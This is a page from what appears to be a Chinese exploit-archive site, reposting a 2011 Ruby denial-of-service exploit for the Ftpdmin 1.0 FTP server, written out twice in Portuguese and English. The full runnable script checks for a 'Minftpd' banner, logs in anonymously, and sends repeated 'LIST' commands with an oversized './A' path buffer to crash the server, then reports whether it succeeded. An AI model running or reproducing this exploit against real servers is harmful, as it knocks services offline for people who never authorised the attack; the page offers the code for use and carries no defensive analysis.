首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ftpdmin 1.0 Denial Of Service
来源:Louredo_@hotmail.com 作者:C4SS!0 发布时间:2011-03-21  
#!/usr/bin/ruby
#
#
#[+]Exploit Title: Exploit Denial of Service Ftpdmin 1.0
#[+]Date: 03\14\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.softpedia.com/get/Internet/Servers/FTP-Servers/ftpdmin.shtml
#[+]Version: 1.0
#[+]Tested On: WIN-XP SP3 Porguese Brazilian
#[+]CVE: N/A
#[+]Language: Portuguese and English
#
#
#       xxx     xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx
#        xxx   xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx  
#         xxx xxx         xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx                    
#          xxxxx          xxx       xxx      xxx       xxx      xxx       xxx           xxxxxx   
#           xxx           xxx       xxx      xxx       xxx      xxx       xxx          xxxxxxxx  xxxxxxxx  xxxxxxxxx
#         xxxxxx          xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx    xx  xx
#        xxx  xxx         xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx xxxx   xx  xxxxx
#      xxx     xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx   xxx    xxxxxxxx  xx   xx   xx     xx
#     xxx       xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx    xxx     xxxxxx   xx    xx  xxxxxxxxx
#
#
#Criado por C4SS!0 G0M3S
#E-mail Louredo_@hotmail.com
#Site www.exploit-br.org
#
#
#

require 'socket'
require 'fcntl'

#
#
#AQUI O EXPLOIT ESTA EM PORTUGUES
#-----------------------------------------
#
def portuguese()
def len(str)
 return str.length
end

sys = `ver`
if sys=~/Windows/
system("cls")
system("color 4f")
else
system("clear")
end

def usage()
print """

         =======================================================
         =======================================================
         ==========Exploit Denial of Service Ftpdmin 1.0========
         ==========Autor C4SS!0 G0M3S===========================
         ==========E-mail Louredo_@hotmail.com==================
         ==========Site www.exploit-br.org======================
         =======================================================
         =======================================================

"""
end

if len(ARGV)!=2 
   usage()
   print "\t\t[-]Modo de Uso: ruby #{$0} <Host> <Porta>\n"
   print "\t\t[-]Exemplo: ruby #{$0} 192.168.1.2 21\n"
   exit(0)
end
usage()
buf  = "./A" * (150/3)

host = ARGV[0]
porta = ARGV[1].to_i
print "\t\t[+]Conectando ao Servidor #{host}...\n\n"
sleep(1)
begin
s =  TCPSocket.new(host,porta)
print "\t\t[+]Checando se o Servidor e Vulneravel\n\n"
sleep(1)
rescue
print "\t\t[+]Erro ao se Conectar no Servidor\n"
exit(0)
end
banner = s.recv(2000)
s.close
unless banner =~/Minftpd/
   print "\t\t[+]Sinto Muito, o Servidor Nao e Vulneravel:(\n"
   sleep(1)
   exit(0)
 end
 print "\t\t[+]Servidor e Vulneravel:)\n\n"
 sleep(1)
 print "\t\t[+]Enviando Exploit...\n\n"
sleep(1)

i=0
while i<20
sock = TCPSocket.new(host,porta)
sock.recv(2000)
sock.puts "USER anonymous\r\n"
sock.recv(2000)
sock.puts "PASS anonymous\r\n"
sock.recv(2000)
sock.puts "LIST #{buf}\r\n"
sock.close
i+=1
end
print "\t\t[+]Exploit Enviado com Sucesso\n\n"
sleep(1)
print "\t\t[+]Checando se o Exploit Funcionou\n\n"
sleep(5)

begin
so = TCPSocket.new(host,porta)
so.send("2000")
print "\t\t[+]Sinto Muito,O Exploit Nao Funcionou:(\n\n"
rescue
print "\t\t[+]Parabens, O Exploit Funcionou com Sucesso:)\n\n"
end
end
#
#HERE THE EXPLOIT IS IN ENGLISH
#----------------------------------	
#
def english()

def len(str)
 return str.length
end

sys = `ver`
if sys=~/Windows/
system("cls")
system("color 4f")
else
system("clear")
end

def usage()
print """

         =======================================================
         =======================================================
         ==========Exploit Denial of Service Ftpdmin 1.0========
         ==========Autor C4SS!0 G0M3S===========================
         ==========E-mail Louredo_@hotmail.com==================
         ==========Site www.exploit-br.org======================
         =======================================================
         =======================================================

"""
end

if len(ARGV)!=2 
   usage()
   print "\t\t[-]Usage: ruby #{$0} <Host> <Porta>\n"
   print "\t\t[-]Exemple: ruby #{$0} 192.168.1.2 21\n"
   exit(0)
end
usage()
buf  = "./A" * (150/3)

host = ARGV[0]
porta = ARGV[1].to_i
print "\t\t[+]Connecting to Server #{host}...\n\n"
sleep(1)
begin
s =  TCPSocket.new(host,porta)
print "\t\t[+]Checking if server is vulnerable\n\n"
sleep(1)
rescue
print "\t\t[+]Error to Connect to Server\n"
exit(0)
end
banner = s.recv(2000)
s.close
unless banner =~/Minftpd/
   print "\t\t[+]I'm Sorry, the Server is not Vulnerable:(\n"
   sleep(1)
   exit(0)
 end
 print "\t\t[+]Server is Vulnerable:)\n\n"
 sleep(1)
 print "\t\t[+]Sending Exploit...\n\n"
sleep(1)

i=0
while i<20
sock = TCPSocket.new(host,porta)
sock.recv(2000)
sock.puts "USER anonymous\r\n"
sock.recv(2000)
sock.puts "PASS anonymous\r\n"
sock.recv(2000)
sock.puts "LIST #{buf}\r\n"
sock.close
i+=1
end
print "\t\t[+]Submitted Exploit Success\n\n"
sleep(1)
print "\t\t[+]Checking if the Exploit Works\n\n"
sleep(5)

begin
so = TCPSocket.new(host,porta)
so.send("2000")
print "\t\t[+]I'm Sorry, The Exploit Not Worked:(\n\n"
rescue
print "\t\t[+]Congratulations, The exploit worked with Success:)\n\n"
end

end

def start()

sis = `ver`
if sis=~/Windows/
   system("cls")
   system("color 4f")
else
 system("clear")
end

begin

f = File.open("lang.txt","r")
file = f.gets.chomp
if file == "1" 
    portuguese()
end
if file == "2"
   english()
end


rescue

print """

[+]Select Your Language:
[+]Selecine Seu Idioma:

1 - Portugues
2 - English
"""
print "\nWhat Your Language?\n=>"
lang = STDIN.gets.chomp
print lang
if lang == "1"
   f = File.open("lang.txt","w")
   f.write(1)
   f.close
   
   portuguese()
end
if lang == "2"
   f = File.open("lang.txt","w")
   f.write("2")
   f.close   
   english()
end 

end
end


if 10 == 10
   start()
end
   

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MPlayer Lite r33064 m3u SEH Ov
·SpoonFTP 1.2 Denial Of Service
·Mediacoder 2011 RC3 m3u Buffer
·Fake Webcam 6.1 Crash Proof Of
·libzip 0.9.3 _zip_name_locate
·ACTi ASOC 2200 Web Configurato
·iCMS v1.1 Admin SQLi/Bruteforc
·CORE Multimedia Suite 2011 COR
·POP Peeper 3.7 SEH Exploit
·RealNetworks RealPlayer CDDA U
·RealPlayer <= 14.0.1.633 Heap
·Tugux CMS 1.0_final Multiple V
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved